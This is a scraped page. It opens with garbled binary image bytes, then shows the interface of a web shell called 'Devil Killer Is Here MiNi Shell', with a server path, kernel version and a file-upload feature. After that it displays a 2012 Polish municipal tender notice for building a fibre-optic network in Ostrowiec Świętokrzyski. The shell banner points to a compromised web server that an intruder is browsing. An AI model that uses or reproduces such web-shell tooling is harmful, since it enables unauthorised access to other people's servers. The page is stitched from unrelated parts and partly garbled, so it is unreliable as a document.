JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/28788-N-2012.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Zaprojektowanie i rozbudowa sieci światłowodowej w Ostrowcu Świętokrzyskim w ramach projektu E-świętokrzyskie - budowa miejskich sieci światłowodowych jst.</b><br>
<b>Numer ogłoszenia: 28788 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrowiec Świętokrzyski , ul. Głogowskiego 3/5, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. (041) 2672100, faks (041) 2672110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.ostrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i rozbudowa sieci światłowodowej w Ostrowcu Świętokrzyskim w ramach projektu E-świętokrzyskie - budowa miejskich sieci światłowodowych jst..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje zaprojektowanie i wybudowanie rurociągu kablowego z rur prefabrykowanych wypełnionych mikrorurkami bezpośrednio połączonego z wyznaczonymi obiektami, zaciągnięcie do wybudowanych rurociągów oraz istniejącej kanalizacji kablowej kabli światłowodowych, zaprojektowanie i wykonanie prac adaptacyjno-budowlanych przewidzianych do wykonania w pomieszczeniach, w których będą zamontowane szafy dystrybucyjne, dostawa, montaż i uruchomienie urządzeń aktywnych dla węzła głównego oraz węzłów końcowych, instalację punktów HOT-SPOT, dostawę, montaż i uruchomienie urządzeń aktywnych dla instalacji HOT-SPOT, przebudowę istniejących kabli światłowodowych, doprowadzonych do serwerowni Urzędu Miasta, wybudowanych w ramach -Budowy sieci światłowodowej w Ostrowcu Świętokrzyskim-etap I- wraz z przeniesieniem urządzeń aktywnych.
2.	W szczególności zamówienie obejmuje:
3.	Opracowanie dokumentacji projektowej:
4.	Projekt rozbudowy sieci światłowodowej wraz z przyłączami,
5.	Projekt konfiguracji i instalacji sieciowych urządzeń aktywnych,
6.	Projekt adaptacji pomieszczeń dla potrzeb punktów dostępowych.
7.	Budowa przyłączy światłowodowych obejmujących  :
8.	Budowę kanalizacji teletechnicznej,
9.	Budowę kabli światłowodowych dla sieci szerokopasmowej,
10.	Wprowadzenie i zakończenie kabli OTK do budynków,
i.	w relacjach:
11.	Punkt Centralny Urząd Miasta,
12.	Punkt Centralny Urząd Miasta -  Publiczne Gimnazjum nr 1 ; ul. Sienkiewicza 69 - 8J ,
13.	Punkt Centralny Urząd Miasta -  Publiczne Gimnazjum nr 2; ul. Polna 56 - 8J,
14.	Punkt Centralny Urząd Miasta - Publiczne Gimnazjum nr 3;  Os. Słoneczne 35 - 8J,
15.	Punkt Centralny Urząd Miasta - Publiczne Gimnazjum nr 4 (Zespół Szkół Publicznych  nr 2); 
Os. Stawki 35 - 8J,
16.	Punkt Centralny Urząd Miasta - Publiczne Gimnazjum nr 5 i Publiczna Szkoła Podstawowa nr 11 (Zespół Szkół Publicznych  nr 1)-  ;ul. Focha 3 - 16J,
17.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 1; ul. Trzeciaków 35 - 8J,
18.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 3; ul. Niska 9 - 8J,
19.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 4; ul. Sienkiewicza 70 - 8J,
20.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 5; Os. Ogrody 20 - 8J,
21.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 7; ul. Akademicka 20 - 8J,
22.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 8; ul. Górna 3 - 8J,
23.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 9; ul. Niewiadoma 19 - 8J,
24.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 10; ul. Rzeczki 18 - 8J,
25.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 12; ul. Bałtowska 336a - 8J,
26.	Punkt Centralny Urząd Miasta - Publiczna Szkoła Podstawowa nr 14 (Zespół Szkół Publicznych nr 2); Os. Stawki 35 - 8J,
27.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 5; ul. Jasna 4 - 8J,
28.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 7; Os. Słoneczne 28 - 8J,
29.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 11; ul. Wspólna 20 - 8J,
30.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 12; Os. Słoneczne 5 - 8J,
31.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 15; Os. Ogrody 27 - 8J,
32.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 16; Os. Pułanki 6 - 8J,
33.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 19; Os. Ogrody 20 - 8J,
34.	Punkt Centralny Urząd Miasta - Publiczne Przedszkole nr 21; Os. Stawki 43 - 8J,
35.	Punkt Centralny Urząd Miasta - Zakład Usług Miejskich; ul. Żeromskiego 11 - 8J,
36.	Punkt Centralny Urząd Miasta - Miejskie Wodociągi i Kanalizacja Sp. z o.o.; ul. Długa 14 - 8J,
37.	Punkt Centralny Urząd Miasta - Miejska Biblioteka Publiczna F1/5; ul. Sienkiewicza 65/15 - 8J,
38.	Punkt Centralny Urząd Miasta - Miejska Biblioteka Publiczna F2; Os. Stawki 45 - 8J,
39.	Punkt Centralny Urząd Miasta - Miejska Biblioteka Publiczna F6/11; ul. Kilińskiego 12 - 8J,
40.	Punkt Centralny Urząd Miasta - Miejska Biblioteka Publiczna F7; ul. Niewiadoma 19 - 8J,
41.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu posesji Os. Słoneczne 5A - 8J,
42.	Punkt Centralny Urząd Miasta - Zakład Budżetowy -Targowiska Miejskie-; ul. Słowackiego 70 - 8J,
43.	Punkt Centralny Urząd Miasta - Miejskie Wodociągi i Kanalizacja Sp. z o.o.-  Oczyszczalnia Ścieków - ul. Mostowa 72 - 32J,
44.	Punkt Centralny Urząd Miasta - Miejskie Wodociągi i Kanalizacja Sp. z o.o. - Ujęcie -Kąty Denkowskie- - 40J,
45.	Punkt Centralny Urząd Miasta - Miejski Ośrodek Sportu i Rekreacji - Piłkarski Ośrodek Treningowy - ul. Kolejowa 20C - 32J,
46.	Punkt Centralny Urząd Miasta - Miejski Ośrodek Sportu i Rekreacji - Moje Boisko Orlik 2012 - 
ul. Chopina - 8J,
47.	Punkt Centralny Urząd Miasta - ZE Zakład Energetyczny (ZEORK); ul. Kopernika 53 - 12J.
48.	Punkt Centralny Urząd Miasta - Muszla Koncertowa w Parku Miejskim im. Marszałka Józefa Piłsudskiego - 16J,
49.	Punkt Centralny Urząd Miasta - Przychodnia MOMP; ul. Świętokrzyska 22 - 60J,
50.	Punkt Centralny Urząd Miasta - CPIAZ; Sandomierska 26a - 44J,
51.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu skrzyżowania ulic 3-go Maja i Okólnej - 12J,
52.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu skrzyżowania ulic Słowackiego i Kilińskiego - 4J,
53.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu skrzyżowania ulic Świętokrzyskiej i Żeromskiego - 8J,
54.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu skrzyżowania ulic Sandomierskiej i Traugutta - 8J,
55.	Punkt Centralny Urząd Miasta - studnia kablowa przy ulicy Sienkiewicza (okolice MWiK) - 20 J,
56.	Punkt Centralny Urząd Miasta - studnia kablowa przy ulicy Sienkiewicza (okolice MBP F1/5) - 8 J,
57.	Punkt Centralny Urząd Miasta - studnia kablowa w pobliżu skrzyżowania ulic Iłżeckiej i Polnej - 8 J,
58.	Punkt Centralny Urząd Miasta - studnia kablowa przy ulicy Jana Pawła II - 8 J,
59.	Punkt Centralny Urząd Miasta - Serwerownia I piętro UM (wykorzystując zakończenie istniejącego kabla 56J),
60.	Budynek ul. Świętokrzyskiej 22 -- serwerownia - piętro IX - z odgałęzieniami do punktów dystrybucyjnych na 7 i 9 piętrze - 128J kabel typu easy access
61.	Przebudowa istniejących kabli światłowodowych  wybudowanych w ramach -Budowy sieci światłowodowej w Ostrowcu Świętokrzyskim - etap I- wraz z przeniesieniem urządzeń aktywnych:
62.	Przebudowa zakończeń kabla światłowodowego 56J wybudowanego w ramach projektu -Budowa sieci światłowodowej w Ostrowcu Świętokrzyskim-- cz. I 
63.	Przebudowa zakończeń kabla światłowodowego 36J wybudowanego w ramach projektu -Budowa sieci światłowodowej w Ostrowcu Świętokrzyskim-- cz. II
64.	Przebudowa zakończeń kabla światłowodowego 48J wybudowanego w ramach projektu -Budowa sieci światłowodowej w Ostrowcu Świętokrzyskim-- cz. III
65.	Przeniesienie, montaż oraz uruchomienie urządzeń aktywnych zainstalowanych w serwerowni na I piętrze budynku Urzędu Miasta do nowej serwerowni zlokalizowanej w piwnicach budynku Urzędu Miasta
66.	Adaptacja pomieszczeń wraz z instalacjami wewnętrznymi dla potrzeby punktów dostępowych :
67.	Punkt Centralny - Urząd Miasta Ostrowiec Świętokrzyski, ul. Jana Głogowskiego 3/5, 
68.	Publiczne Gimnazjum nr 1 - ul. Sienkiewicza 69,
69.	Publiczne Gimnazjum nr 2 - ul. Polna 56,
70.	Publiczne Gimnazjum nr 3 - Os. Słoneczne 35,
71.	Publiczne Gimnazjum nr 4 - Zespół Szkół Publicznych  nr 2 - Os. Stawki 35,
72.	Publiczne Gimnazjum nr 5 - Zespół Szkół Publicznych  nr 1; ul. Focha 3,
73.	Publiczna Szkoła Podstawowa nr 1 - ul. Trzeciaków 35,
74.	Publiczna Szkoła Podstawowa nr 3 - ul. Niska 9,
75.	Publiczna Szkoła Podstawowa nr 4 - ul. Sienkiewicza 70,
76.	Publiczna Szkoła Podstawowa nr 5 - Os. Ogrody 20,
77.	Publiczna Szkoła Podstawowa nr 7 - ul. Akademicka 20,
78.	Publiczna Szkoła Podstawowa nr 8 - ul. Górna 3,
79.	Publiczna Szkoła Podstawowa nr 9 - ul. Niewiadoma 19,
80.	Publiczna Szkoła Podstawowa nr 10 - ul. Rzeczki 18,
81.	Publiczna Szkoła Podstawowa nr 12 - ul. Bałtowska 336a,
82.	Publiczna Szkoła Podstawowa nr 14 - Zespół Szkół Publicznych  nr 2  - Os. Stawki 35,
83.	Publiczne Przedszkole nr 5 - ul. Jasna 4,
84.	Publiczne Przedszkole nr 7 - Os. Słoneczne 28,
85.	Publiczne Przedszkole nr 11 - ul. Wspólna 20,
86.	Publiczne Przedszkole nr 12 - Os. Słoneczne 5,
87.	Publiczne Przedszkole nr 15 - Os. Ogrody 27,
88.	Publiczne Przedszkole nr 16 - Os. Pułanki 6,
89.	Publiczne Przedszkole nr 19 - Os. Ogrody 20,
90.	Publiczne Przedszkole nr 21 - Os. Stawki 43,
91.	Zakład Usług Miejskich - ul. Żeromskiego 11,
92.	Miejskie Wodociągi i Kanalizacja Sp. z o.o. - ul. Długa 14,
93.	Miejska Biblioteka Publiczna F1/5 - ul. Sienkiewicza 65/15,
94.	Miejska Biblioteka Publiczna F2 - Os. Stawki 45,
95.	Miejska Biblioteka Publiczna F6/11 - ul. Kilińskiego 12,
96.	Miejska Biblioteka Publiczna F7 - ul. Niewiadoma 19,
97.	Zakład Budżetowy -Targowiska Miejskie- - ul. Słowackiego 70,
98.	Miejskie Wodociągi i Kanalizacja Sp. z o.o. - Oczyszczalnia Ścieków - ul. Mostowa 72,
99.	Miejskie Wodociągi i Kanalizacja Sp. z o.o. - Ujęcie -Kąty Denkowskie-,
100.	Miejski Ośrodek Sportu i Rekreacji - Piłkarski Ośrodek Treningowy - ul. Kolejowa 20C,
101.	Miejski Ośrodek Sportu i Rekreacji - Moje Boisko Orlik 2012 - ul. Chopina,
102.	Muszla Koncertowa w Parku Miejskim im Marszałka Józefa Piłsudskiego.
103.	Dostawa i montaż urządzeń HOT-SPOT
104.	Wykonanie dokumentacji wykonawczej,
105.	Montaż i uruchomienie hot-spot,
106.	Konfiguracja hot-spot wraz z systemem centralnego zarządzania,
107.	Wykonanie dokumentacji powykonawczej,
108.	Wdrożenie pracowników Zamawiającego do obsługi urządzeń zamontowanych w ramach punktów hot-spot.
109.	Dostawa  i instalacja sprzętu aktywnego
110.	Sprzęt aktywny dla węzła głównego,
111.	Sprzęt aktywny dla pojedynczego węzła końcowego,
112.	System zabezpieczeń,
113.	Sprzęt aktywny na potrzeby komunikacji oddzielonej od publicznej sieci Internet,
114.	Wdrożenie pracowników Zamawiającego do obsługi urządzeń aktywnych.
115.	Promocja
i.	Wykonanie, dostawa i montaż dużej tablicy informacyjnej - 1 lokalizacja,
ii.	Wykonanie, dostawa i montaż tablic pamiątkowych - 37 lokalizacje,
116.	Wykonanie, dostawa i umieszczenie naklejek promocyjnych.
117.	Szczegółowy opis przedmiotu zamówienia został dołączony do Specyfikacji Istotnych Warunków Zamówienia.
..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.23.00-5, 71.32.00.00-7, 45.31.40.00-1, 45.23.23.32-8, 32.42.40.00-1, 32.43.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  100.000,00 PLN (słownie: sto tysięcy zł 00/100) należy wnieść przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych; 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, póz. 1158 oraz z 2002 r. Nr 25, póz. 253, Nr 66, póz. 596 i Nr 216, póz. 1824 oraz z 2004 r. Nr 145, póz. 1537).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 39 1020 2674 0000 2402 0003 3167 z dopiskiem -Wadium na -Zaprojektowanie i rozbudowę sieci światłowodowej w Ostrowcu Świętokrzyskim w ramach projektu E-świętokrzyskie - budowa miejskich sieci światłowodowych jst-. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a Ustawy. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli: 
a)	wykonawca, którego oferta zostanie wybrana, odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)	wykonawca, którego oferta zostanie wybrana, nie wniesie wymaganego zabezpieczenia należytego wykonania umowy; 
c)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie uzupełnił dokumentów chyba, że udowodni, że wynika to z przyczyn niezależnych od niego 
d)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże należyte wykonanie:

a)	co najmniej dwie roboty budowlane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. roboty budowlane o wartości minimum 2.000.000 zł każda, w zakresie budowy kanalizacji teletechnicznej oraz budowy kabli światłowodowych; 
b)	co najmniej jedną usługę projektową w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości nie mniej niż 100.000 zł brutto zawierającej w swoim zakresie wykonanie dokumentacji na budowę kanalizacji teletechnicznej oraz budowę kabli światłowodowych;
c)	co najmniej jedno zamówienie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegające na dostawie (wraz z instalacją i konfiguracją) sprzętu/urządzeń sieciowych aktywnych oraz pasywnych, o łącznej wartości tego zamówienia nie mniejszej niż 1.000.000 zł brutto.
	
Opis sposobu dokonywania oceny spełniania tego warunku

Wykonawca dołączy do oferty wykaz robót, wykaz dostaw oraz wykaz wykonanych usług projektowych wraz z referencjami lub innymi dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełniania w/w warunku dokonana zostanie w oparciu o informacje zawarte w oświadczeniu oraz w załączonych referencjach wg formuły: spełnia/nie spełnia.
Zamawiający wymaga, by przedstawione referencje jednoznacznie potwierdzały spełnienie wymogów opisanych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest złożenie oświadczenia zawierającego wskazanie osób. W przypadku, gdy wskazana osoba nie jest pracownikiem Wykonawcy, należy załączyć pisemne zobowiązanie innego podmiotu do udostępnienia tej osoby lub wskazać inną podstawę do dysponowania tą osobą w okresie realizacji zamówienia.

Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia - Wykonawca winien wykazać osoby, które będą uczestniczyć w realizacji zamówienia: posiadające wymagane uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane, w szczególności uprawnienia do pełnienia funkcji w zakresie niezbędnym do realizacji zamówienia.
Za spełnienie tego warunku Zamawiający uzna wykazanie dysponowania osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania przedmiotu zamówienia tj.:  
a) minimum 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
b) minimum 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
c) minimum 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
d) minimum 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
e) minimum 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
